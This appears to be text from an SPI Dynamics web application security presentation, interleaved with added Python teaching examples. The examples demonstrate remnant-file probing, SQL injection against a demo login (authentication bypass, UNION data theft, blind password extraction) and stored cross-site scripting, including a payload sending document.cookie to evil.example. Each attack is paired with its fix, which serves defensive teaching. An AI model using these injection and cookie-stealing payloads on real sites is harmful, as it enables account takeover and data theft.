SPI Labs:
Research and development group
Recognized as a leading authority on web application security
[Architecture diagram: Browser (web and wireless clients) -> HTTP(S) across the Internet -> Web Servers (presentation layer, media store, content services) -> Application Server (business logic, access controls, transaction information) -> Database Server (customer identification, core business data); the application and database tiers sit inside the corporate network. Any web server platform, listening on port 80.]
Firewall only allows port 80 (or 443 SSL) traffic from the Internet to the web server (IMAP, FTP, SSH, TELNET and POP3 are shown stopped at the outer firewall).
Firewall only allows the web server to talk to the application server.
Firewall only allows the application server to talk to the database server.
Platform:
Known Vulnerabilities
Known vulnerabilities can be exploited immediately with a minimum amount of skill or experience (script kiddies)
Most easily defendable of all web vulnerabilities
MUST have streamlined patching procedures
MUST have inventory process
Administration:
Extension Checking
Common File Checks
Data Extension Checking
Backup Checking
Directory Enumeration
Path Truncation
Hidden Web Paths
Forceful Browsing
Less easily corrected than known issues
Require increased awareness
More than just configuration, must be aware of security flaws in actual content
Remnant files can reveal applications and versions in use
Backup files can reveal source code and database connection strings
Robots.txt:
Shows files that the administrator does not want search engines to crawl
Don't show confidential information in this file
Remnant files:
Remnant files are any files that are left on a web server that are not in use or part of the web based application.
Remnant files can include backup files, documentation files, default files (like samples) or any other file that is not part of the production system.
Remnant files solutions:
Never leave unnecessary files on a web server (e.g. Web.config.old)
Assume all files on a web server will be seen by a hacker.
Encrypt sensitive information (such as connection strings) in configuration files
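The Robots.txt and Backup Checking points above describe two of the checks an assessor runs against a web root: read the Disallow entries the administrator published, then probe known files for the backup variants editors leave behind. The script below is an added example, not code from the SPI Dynamics deck; the robots.txt, the directory listing and the suffix list are constructed for the demo, and the listing stands in for the HTTP requests a real check would make.

```python
"""Added example (not from the SPI Dynamics deck): enumerate the hidden paths a
robots.txt advertises and the remnant/backup variants of known files, then check
them against a constructed directory listing that stands in for a live server."""

# Constructed sample robots.txt, as a careless administrator might publish it.
SAMPLE_ROBOTS_TXT = """\
User-agent: *
Disallow: /admin/
Disallow: /backup/
Disallow: /Web.config
Allow: /public/
"""

# Suffixes editors and administrators commonly leave behind (assumed list).
REMNANT_SUFFIXES = (".old", ".bak", ".orig", ".txt", ".zip", "~")

# Constructed web root listing standing in for what a real server would answer.
SAMPLE_LISTING = {
    "/index.asp",
    "/Web.config",
    "/Web.config.old",
    "/admin/login.asp",
    "/admin/login.asp.bak",
    "/backup/site.zip",
    "/public/help.htm",
}


def disallowed_paths(robots_txt):
    """Return the Disallow entries of a robots.txt: the paths the admin wants hidden."""
    paths = []
    for line in robots_txt.splitlines():
        line = line.split("#", 1)[0].strip()      # drop comments and whitespace
        if line.lower().startswith("disallow:"):
            path = line.split(":", 1)[1].strip()
            if path:
                paths.append(path)
    return paths


def remnant_candidates(path, suffixes=REMNANT_SUFFIXES):
    """Backup-style variants of a file path that a remnant-file check should probe."""
    return [path + s for s in suffixes]


def find_remnants(listing, known_files):
    """Known files that also exist in a remnant form on the (constructed) server."""
    found = {}
    for path in known_files:
        hits = [c for c in remnant_candidates(path) if c in listing]
        if hits:
            found[path] = hits
    return found


def hidden_dirs_present(listing, robots_txt):
    """Disallowed directories that actually hold files: forceful-browsing targets."""
    dirs = [p for p in disallowed_paths(robots_txt) if p.endswith("/")]
    return sorted({d for d in dirs for f in listing if f.startswith(d)})


if __name__ == "__main__":
    print("robots.txt hides:", disallowed_paths(SAMPLE_ROBOTS_TXT))
    print("hidden dirs with content:", hidden_dirs_present(SAMPLE_LISTING, SAMPLE_ROBOTS_TXT))
    print("remnants:", find_remnants(SAMPLE_LISTING, ["/Web.config", "/admin/login.asp"]))
```

Against the constructed listing the check reports `/Web.config.old` and `/admin/login.asp.bak`, exactly the files the slide warns about: a backup of the configuration can carry a database connection string, and a backup of a script page is served as plain text rather than executed. In a real assessment the membership test against `SAMPLE_LISTING` is replaced by an HTTP request per candidate, and a 200 response is the hit.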
Application Programming:
Application Mapping
Cookie Manipulation
Custom Application Scripting
Parameter Manipulation
Reverse Directory Traversal
Brute Force
Cookie Poisoning/Theft
Buffer Overflow
SQL Injection
Cross-site scripting
Common coding techniques do not necessarily include security
Input is assumed to be valid, but not tested
Inappropriate file calls can reveal source code and system files
Unexamined input from a browser can inject scripts into a page for replay against later visitors
Unhandled error messages reveal application and database structures
Unchecked database calls can be piggybacked with a hacker's own database call, giving direct access to business data through a web browser
SPI Dynamics Confidential
SQL Injection:
Goal:
Pass a SQL command to the web based application and have that command executed on the database server
Use the exploit to steal data or damage/alter the database.
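The goal on the slide, a SQL command passed through the application and executed on the database, is easiest to see on the login query itself. The code below is an added example, not from the SPI Dynamics deck or the WebInspect demo: an in-memory SQLite database with constructed users and orders, the query a careless application builds by string concatenation, three injections against it (authentication bypass, UNION-based data theft, and the character-by-character inference used in the blind case from the demo list), and the parameterized query that closes the hole. The table names, accounts and passwords are assumptions for the demo.

```python
"""Added example (not from the SPI Dynamics deck): SQL injection against a login
query built by string concatenation, and the parameterized fix. In-memory SQLite
with constructed rows stands in for the application's database."""
import sqlite3


def build_db():
    """Constructed sample schema: a user table and the business data behind it."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw TEXT, role TEXT);
        INSERT INTO users VALUES (1, 'alice', 'Summer2004!', 'admin');
        INSERT INTO users VALUES (2, 'bob',   'hunter2',     'user');
        CREATE TABLE orders (id INTEGER PRIMARY KEY, customer TEXT, total REAL);
        INSERT INTO orders VALUES (100, 'ACME Corp', 9999.50);
    """)
    return db


def login_vulnerable(db, user, pw):
    """Vulnerable: user-controlled text becomes part of the SQL statement."""
    sql = ("SELECT name, role FROM users WHERE name = '" + user +
           "' AND pw = '" + pw + "'")
    return db.execute(sql).fetchall()


def login_safe(db, user, pw):
    """Fixed: placeholders keep the input as data; it can never become SQL syntax."""
    sql = "SELECT name, role FROM users WHERE name = ? AND pw = ?"
    return db.execute(sql, (user, pw)).fetchall()


def blind_extract(db, user, column, max_len=12):
    """Blind injection: the page only reveals logged-in / not logged-in, so each
    character of the target column is recovered with a true/false condition on
    the victim's row. Uses SQLite's substr() and unicode() functions."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for code in range(32, 127):           # printable ASCII
            probe = (user + "' AND unicode(substr(" + column + "," + str(pos) +
                     ",1)) = " + str(code) + " --")
            if login_vulnerable(db, probe, "x"):
                recovered += chr(code)
                break
        else:
            break                             # no character matched: end of value
    return recovered


if __name__ == "__main__":
    db = build_db()
    # Bypass: the comment sequence discards the password check entirely.
    print(login_vulnerable(db, "alice' --", "wrong"))
    # Tautology: every row satisfies 1=1, so every account is returned.
    print(login_vulnerable(db, "' OR 1=1 --", "x"))
    # Piggybacked query: business data read straight through the login form.
    print(login_vulnerable(db, "' UNION SELECT customer, total FROM orders --", "x"))
    # Blind: alice's password recovered one character at a time.
    print(blind_extract(db, "alice", "pw"))
    # The same inputs against the parameterized query match no row.
    print(login_safe(db, "alice' --", "wrong"), login_safe(db, "alice", "Summer2004!"))
```

Two points worth noticing when running it. The blind case never sees a single byte of data in a response; it needs only the difference between a successful and a failed login, which is why a verbose error message is not a prerequisite for injection. And the fix is not escaping quotes but binding parameters: `login_safe` receives the same attack strings and matches nothing, because the driver never lets them touch the statement text. Stacked statements (`'; DROP TABLE ...`) are not shown because SQLite's `execute()` runs one statement at a time; on servers that accept batches they are the same bug with a larger blast radius.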
Demo
Browser based
HTTP Based
Automated SQL Injection
Blind SQL Injection
[Demo screenshot: cookie names observed on the target site: TestSess, Site cookie, Seg, TestPerm, ProfileAddressVerified, ProfileID, MEMUSER, USERID, SESSIONUSERID, PROFILE]
Source: www.wikipedia.org
Phishing Defined (source: www.antiphishing.org)
[Screenshot residue: http://www.fakeserver.com, http://www.nubank.com]
Company X Security Fix:
Use validateRequest=false cautiously: it switches off ASP.NET request validation, so nothing else stops script arriving in the input
Encode untrusted output with Server.HTMLEncode
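The Company X fix and the earlier Application Programming point ("unexamined input from a browser can inject scripts into a page for replay against later visitors") are the same stored cross-site scripting bug seen from both sides. The comment board below is an added example, not code from the deck or from Company X: `html.escape` plays the role of Server.HTMLEncode, the comments are constructed, and the naive filter is included only to show why rejecting a pattern on input is not a substitute for encoding on output once request validation has been turned off.

```python
"""Added example (not from the SPI Dynamics deck): a review page that stores
visitor comments and replays them to later visitors. The unsafe renderer injects
the first visitor's script into every later page; the fixed renderer HTML-encodes
at the point of output, the html.escape equivalent of Server.HTMLEncode."""
import html

# Constructed visitor comments; the second and third are XSS payloads.
COMMENTS = [
    "Great product, 5 stars",
    "<script>document.location='http://evil.example/?c='+document.cookie</script>",
    '<img src=x onerror="alert(document.cookie)">',
]

PAGE = "<html><body><h1>Reviews</h1>{items}</body></html>"


def render_unsafe(comments):
    """Vulnerable: stored input is concatenated into the HTML untouched."""
    items = "".join("<p>" + c + "</p>" for c in comments)
    return PAGE.format(items=items)


def render_encoded(comments):
    """Fixed: every untrusted value is encoded where it is written into HTML.
    quote=True also encodes ' and ", so the value cannot break out of an
    attribute either."""
    items = "".join("<p>" + html.escape(c, quote=True) + "</p>" for c in comments)
    return PAGE.format(items=items)


def naive_filter(comment):
    """Input blacklist that rejects only '<script'. Accepts the img/onerror
    payload, which runs just as well: filtering input is not the fix."""
    return "<script" not in comment.lower()


def executable_tags(page):
    """Crude tester's check on rendered output: a live <script> or <img> tag in
    the page means untrusted data reached the browser unencoded."""
    lower = page.lower()
    return "<script" in lower or "<img" in lower


if __name__ == "__main__":
    print("unsafe page has executable tags:", executable_tags(render_unsafe(COMMENTS)))
    print("encoded page has executable tags:", executable_tags(render_encoded(COMMENTS)))
    filtered = [c for c in COMMENTS if naive_filter(c)]
    print("survives naive filter, still executes:", executable_tags(render_unsafe(filtered)))
    print(render_encoded(COMMENTS))
```

The encoded page still displays the attacker's text verbatim (`&lt;script&gt;...` renders as the literal characters), which is the correct outcome: the data is preserved and only its ability to be parsed as markup is removed. The filter, by contrast, blocks one payload and passes the next, and every new HTML feature adds another way past it.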
[Timeline: 1990s to 2004: Zero Liability, Federal Trade Commission]
Regulatory requirements:
GLB
HIPAA
SOX
CA1386
Legal precedents
[Lifecycle diagram, shown three times in the deck: phases Design, Development, Testing, Production and Audit; participants Developers, QA and Developers, Security Operations, Auditors, and Auditors, Dev, Compliance and Business Subject Matter Experts (SME)]
Creating Secure Applications: People, Process/SDL, Tools
Almost 40 percent of developers say that their companies do not think it is very important to write secure applications
http://msdn.microsoft.com/security/sdl
[Annotated code sample with four flaws:]
Hard to guess password! (credential hard-coded in the source)
String concat for dynamic SQL
Connecting as sysadmin
Telling the bad guy too much on failure
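The annotated sample is not reproduced on the page, so the block below is an added example, not the SDL slide's code: it puts the three flaws other than dynamic SQL beside their fixes. SQLite stands in for the database server, a read-only connection plays the part of a least-privilege account instead of sysadmin, the password comes from an environment variable (assumed name ORDERS_DB_PASSWORD) instead of the source, and failures are logged in full on the server while the user sees a generic message. The query itself is parameterized; the database file and row are constructed for the demo.

```python
"""Added example (not from the SDL slide): hard-coded credential, sysadmin
connection and verbose failure, each beside its fix. SQLite stands in for the
database; the file and row are constructed."""
import logging
import os
import sqlite3
import tempfile
from pathlib import Path

log = logging.getLogger("orders")

# --- flaw 1: hard-coded credential ("hard to guess password!") ----------------
DB_PASSWORD = "p@ssw0rd"            # lives in source control and every backup


def password_from_config(env=os.environ):
    """Fix: read the secret from the deployment environment (assumed variable
    ORDERS_DB_PASSWORD) and fail closed if it is missing."""
    pw = env.get("ORDERS_DB_PASSWORD")
    if not pw:
        raise RuntimeError("ORDERS_DB_PASSWORD not configured")
    return pw


# --- flaw 2: connecting as sysadmin ------------------------------------------
def make_db_file():
    """Constructed orders database on disk, so it can be reopened read-only."""
    path = os.path.join(tempfile.mkdtemp(), "orders.db")
    db = sqlite3.connect(path)
    db.execute("CREATE TABLE orders (id INTEGER PRIMARY KEY, total REAL)")
    db.execute("INSERT INTO orders VALUES (1, 42.0)")
    db.commit()
    db.close()
    return path


def connect_as_sysadmin(path):
    return sqlite3.connect(path)              # full read/write, like 'sa'


def connect_least_privilege(path):
    """SQLite's read-only mode stands in for a DB account limited to SELECT."""
    return sqlite3.connect(Path(path).as_uri() + "?mode=ro", uri=True)


def can_write(db):
    """True if this connection could alter data; the probe is rolled back."""
    try:
        db.execute("DELETE FROM orders")
        db.rollback()
        return True
    except sqlite3.OperationalError:          # "attempt to write a readonly database"
        return False


# --- flaw 3: telling the bad guy too much on failure ---------------------------
def broken_db():
    """An empty database: every query fails, as after a deployment mistake."""
    return sqlite3.connect(":memory:")


def order_total_verbose(db, order_id):
    """Flaw: the raw exception, naming tables and columns, goes to the browser."""
    try:
        row = db.execute("SELECT total FROM orders WHERE id = ?", (order_id,)).fetchone()
        return "Total: %s" % row[0]
    except Exception as exc:
        return "Error: " + str(exc)


def order_total_safe(db, order_id):
    """Fix: full detail to the server log, a fixed message to the user."""
    try:
        row = db.execute("SELECT total FROM orders WHERE id = ?", (order_id,)).fetchone()
        return ("Total: %s" % row[0]) if row else "Order not found"
    except sqlite3.Error:
        log.exception("order lookup failed for id=%r", order_id)
        return "Error: request could not be processed"


if __name__ == "__main__":
    path = make_db_file()
    print("sysadmin can write:", can_write(connect_as_sysadmin(path)))
    print("least privilege can write:", can_write(connect_least_privilege(path)))
    print("verbose:", order_total_verbose(broken_db(), 1))
    print("safe:   ", order_total_safe(broken_db(), 1))
    print("normal: ", order_total_safe(connect_least_privilege(path), 1))
```

The verbose path answers `Error: no such table: orders`, handing the attacker a table name to use in the injection on the earlier slide; the safe path answers the same generic sentence for every failure while the stack trace goes to the log. Combined with the read-only account, a successful injection can at most read what the application itself may read, not drop tables or create logins.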
People
Guidance
Training
Accountability
Process
Security is an evolving challenge
SDL process has proven effective at improving software security
As operating system security improves, attackers will move up the stack
Be ready to meet the challenge
http://msdn.microsoft.com/security/sdl
Tools
People cannot find all the defects
Development
Secure development training
Develop secure applications
Testing applications in development
QA
Testing for security bugs
Production / Security
Validating systems are secure prior to going live
Audit
Continued validation of production systems and processes
Establish remediation processes for production systems
Q&A
Break
WebInspect Demo
For a free 15 day trial of WebInspect please visit http://www.spidynamics.com